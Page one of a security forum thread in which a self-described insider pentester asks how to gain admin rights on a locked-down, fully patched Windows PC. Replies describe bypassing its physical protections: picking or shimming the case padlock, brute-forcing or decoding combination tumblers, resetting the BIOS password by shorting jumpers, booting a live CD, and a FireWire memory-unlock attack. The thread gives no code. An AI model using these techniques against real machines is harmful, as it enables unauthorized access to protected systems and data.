Page 1 of 3 123 LastLast
Results 1 to 10 of 23

Thread: HELP - Escalate privilege in (well configured) Windows.

  1. #1
    Just burned his ISO
    Join Date
    May 2008
    Posts
    24

    Default HELP - Escalate privilege in (well configured) Windows.

    Hi,

    I'm pen-testing a different environment, my pen-test is internal (more like insider).

    All I have is a PC from the company (without any tools, only Windows) connected to the local network.

    My job is (try) escalate privilege in this machine and get into the servers on the network.

    Until here, all appear very easy, but have some special points:

    - The computer have a clean Windows installations (with a small number of third programs, just a MS office, AntiVirus, and a program used internal - a kind of ERP).

    - The Windows system is FULL patched (WSUS).

    - My user privilege is very low, i have basic no permissions at computer.

    - The computer also have strong Windows Polices (I can't change wallpapers, see configuration properties, etc).

    - The computer have the disc encrypted (A kind of TrueCrypt).

    - The computer have a CD-ROM and USB port, HOWEVER I'm unable to acess it (some program (maybe a end point security?) doesn't allow me to access it.

    - The sequence of BOOT doesn't allow boot via CD or USB.

    - The BIOS boot is protected by passwords.

    - All physical ports in the CPU are locked with a kind of "pad locks" for computers.

    - The PC do not have internet connection.

    - I can not use my own laptop in the network cable.

    - There is no Wireless network.


    NOW..... What I thinked!

    - Reset the BIOS password via Windows (W W W.cgsecurity.org/wiki/CmosPwd), however it need administrative privilege.

    - By the way, boot with BT on CD or USB is not possible.

    - I had think in try a local brute force against the administrator account, since it's local, maybe it can work. Maybe there is a kind of fast (multi thread) tool which allow locally brute force windows (maybe via "runas" feature) accounts? Anyone have any hint for me?

    - I remember sometime ago a lot of people in the internet spoke that a "firewire" device could be used to break into any windows. A kind of "plug and root" via firewire, where it could copy hash files or unluck Administrator password. Someone aware (link) with detailed description about how to build one?

    I found:

    W W W.infopackets.com/news/hardware/2008/20080311_firewire_hack_also_works_with_windows_vis ta.htm

    And even:

    storm.net.nz/static/files/winlockpwn

    The big question is, how to build one? Which I need? I really need a Ipod? Can't be something less expensive? Maybe my own computer? There is someplace a step by step?

    Obs.: All sites with "W W W" you must remove the space, I type in this way, because my account in forum is not allowed to post URL yet.

    I have no more ideas.

    Do you have any idea or hint to me? All syggestions are welcome.

    Thanks

  2. #2
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    What kind of pad lock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password and finally reboot computer using a BT3 live-CD or USB.
    -Monkeys are like nature's humans.

  3. #3
    Senior Member Thorn's Avatar
    Join Date
    Jan 2010
    Location
    The Green Dome
    Posts
    1,509

    Default

    Quote Originally Posted by =Tron= View Post
    What kind of pad lock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password and finally reboot computer using a BT3 live-CD or USB.

    Overall, this sounds like a fairly secure PC for the 'average user' in a business environment.


    I'm with Tron on this:

    1) Pick the lock and reset the BIOS.
    2) Set BIOS for USB or CD boot.
    3) Boot BT (or other Live Distro) in appropriate device.
    4) Proceed with attack(s) from there.

    Of course, some of this depends on the scope of the contract. For example, are you allowed to physically open the machine under the contract?

    Out of curiousity, why aren't you allowed to use a laptop on the network?
    Thorn
    Stop the TSA now! Boycott the airlines.

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    Out of curiousity, why aren't you allowed to use a laptop on the network?
    This is the part I don't understand either. These seem like extreme parameters for a business level pentest. Maybe if we knew the terms of the contract we could help find a loop hole.

  5. #5
    Senior Member Talkie Toaster's Avatar
    Join Date
    Jun 2008
    Location
    Scotland
    Posts
    131

    Default

    Quote Originally Posted by =Tron= View Post
    What kind of pad lock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password and finally reboot computer using a BT3 live-CD or USB.
    I love your method!

    But seriously though, in the UK computer locks and those easily pickable 'circle key' cam locks were never very popular, but i sometimes see them on US stuff on ebay. Maybe a pentesters guide on how to do this safely without breaking anything (clients machine remember...) would be useful, as most of the ones coming up on google seem to be for skiddies or for people with stolen laptops!

    The MIT guide to lockpicking by a guy called Ted The Tool is a good place to start. i'm sure it will be of interest to many members here. Think of it as 'hacking' a lock!

    TT

  6. #6
    Just burned his ISO
    Join Date
    May 2008
    Posts
    24

    Default

    Hi,

    Thank you all for replys.

    What kind of pad lock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password and finally reboot computer using a BT3 live-CD or USB.
    I spoke with the contractors and it's allowed. However I was unable to lockpick the device. It's a secure pad-lock more or less like this (don't know the name of this lock in english):

    W W W.nomadtravel.co.uk/images/products/471719ad98c15.jpg

    Also this device have a key, so you only open it if you are able to unlock (or lockpick) both, the number sequence + key.

    In the client, is a division that is responsible for physical security and they control all environment via video cameras, if I start to play much time with the lock, they come and warning me it's not allowed and I can suffer legal action. Obvious, when I explain the case and they speak with the manager of the project all be good.

    In the end, I think I will not be open this padlock.

    Out of curiousity, why aren't you allowed to use a laptop on the network?
    Because here is a controlled environment, where only have some special employs (they access really sensitive data), no one is allowed to enter in the environment with laptops, cellphones, pda, etc.

    So the goal of the project, is identify what a real employ with bad intentions should be able to do and access....

    I looked at BT3 and it have the firmware exploit (storm.net.nz/static/files/winlockpwn) to unlock Windows machine, maybe it can be my way to break into.

    Someone already used it with sucess? What I need to create a firewire exploit device to exploit it?

    Is possible to do it directly with a firewall cable, connected between 2 computers (victim and attacker)?

    Someone have a link about how to build one or a description?

    Any other ideas are welcome...

    Thanks

    cya

  7. #7
    Senior Member Thorn's Avatar
    Join Date
    Jan 2010
    Location
    The Green Dome
    Posts
    1,509

    Default

    Quote Originally Posted by The Dan View Post
    Hi,

    Thank you all for replys.



    I spoke with the contractors and it's allowed. However I was unable to lockpick the device. It's a secure pad-lock more or less like this (don't know the name of this lock in english):

    W W W.nomadtravel.co.uk/images/products/471719ad98c15.jpg

    Also this device have a key, so you only open it if you are able to unlock (or lockpick) both, the number sequence + key.

    In the client, is a division that is responsible for physical security and they control all environment via video cameras, if I start to play much time with the lock, they come and warning me it's not allowed and I can suffer legal action. Obvious, when I explain the case and they speak with the manager of the project all be good.

    In the end, I think I will not be open this padlock.
    Get a beer can! (If that doesn't make any sense, google for "padlock beer can shim" w/o quotes or read this: http://www.i-hacked.com/content/view/189/48/)
    Thorn
    Stop the TSA now! Boycott the airlines.

  8. #8
    Senior Member streaker69's Avatar
    Join Date
    Jan 2010
    Location
    Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
    Posts
    3,535

    Default

    This is what I use when I need to escalate physical privileges.

    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

  9. #9
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by The Dan View Post
    I spoke with the contractors and it's allowed. However I was unable to lockpick the device. It's a secure pad-lock more or less like this (don't know the name of this lock in english):

    W W W.nomadtravel.co.uk/images/products/471719ad98c15.jpg
    If the combination padlock actually only have three tumblers this will make the combination pretty easy to bruteforce, i.e. try each of the 1000 possible combinations one by one. Many of these kinds of padlocks are also possible to open by inserting a really slim pick into the space between the actual lock and the metal hook. This does take some practice in order to learn how to utilize the pick, but is not nearly as hard as one could think.

    Quote Originally Posted by The Dan View Post
    Also this device have a key, so you only open it if you are able to unlock (or lockpick) both, the number sequence + key.
    What kind of key/lock is this? The reason I ask is that in case the lock is of the pin tumbler model you would most likely be able to pick it with only some moderate training on beforehand. If it on the other hand is for example Abloy made you can pretty much forget about this approach. I know that I am only concentrating on this method at the time being, but the fact is that it does seem like the computer in question is fairly secure software wise. Good lockpicking skills should never be underestimated, and this sounds like a perfect candidate for showing how an otherwise secure environment is possible to compromise by bypassing the physical security surrounding it.
    -Monkeys are like nature's humans.

  10. #10
    Senior Member streaker69's Avatar
    Join Date
    Jan 2010
    Location
    Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
    Posts
    3,535

    Default

    Quote Originally Posted by =Tron= View Post
    If the combination padlock actually only have three tumblers this will make the combination pretty easy to bruteforce, i.e. try each of the 1000 possible combinations one by one. Many of these kinds of padlocks are also possible to open by inserting a really slim pick into the space between the actual lock and the metal hook. This does take some practice in order to learn how to utilize the pick, but is not nearly as hard as one could think.
    Many of those kinds of locks are easily opened just by applying pressure against the mechanism and turning the tumblers until you feel one catch and then move onto the next one. Most of them have fairly loose tolerances and make it pretty easy to open in just a couple of minutes.
    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •